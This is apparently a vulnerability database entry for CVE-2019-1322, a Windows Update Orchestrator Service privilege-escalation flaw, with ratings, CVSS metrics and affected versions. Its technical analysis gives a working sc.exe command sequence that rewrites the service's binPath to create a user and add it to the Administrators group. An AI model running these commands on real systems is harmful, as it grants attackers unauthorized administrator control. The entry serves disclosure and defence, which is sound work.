Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Local
0

CVE-2019-1322

Disclosure Date: October 10, 2019
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

An elevation of privilege vulnerability exists when Windows improperly handles authentication requests, aka ‘Microsoft Windows Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2019-1320, CVE-2019-1340.

Add Assessment

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

This is an elevation of privilege vulnerability that exists when Windows improperly handles authentication requests by leveraging the Update Orchestrator Service. If an attacker successfully exploits this vulnerability they can run processes in an elevated context.

Prerequisite:

The Update Orchestrator Service runs as NT AUTHORITY\SYSTEM and any user in the group NT AUTHORITY\SERVICE have full access to modify the service.

It is known to affect Windows 10 1803 and above that have not been updated with the November 12th, 2019 security update patch (or above).

Exploitation:

Create tmpUser, add to local administrators group, and reset the service to its default state.

sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="cmd /c net user /add tmpUser tmpPassword123"
sc.exe start UsoSvc
sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="cmd /c net localgroup Administrators /add tmpUser"
sc.exe start UsoSvc
sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="C:\Windows\System32\svchost.exe -k netsvcs -p"
sc.exe start UsoSvc
CVSS V3 Severity and Metrics
Base Score:
7.8 High
Impact Score:
5.9
Exploitability Score:
1.8
Vector:
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • microsoft

Products

  • windows 10 1803 -,
  • windows 10 1809 -,
  • windows 10 1903 -,
  • windows server 1803 -,
  • windows server 1903 -,
  • windows server 2019 -

Exploited in the Wild

Reported by:

Additional Info

Technical Analysis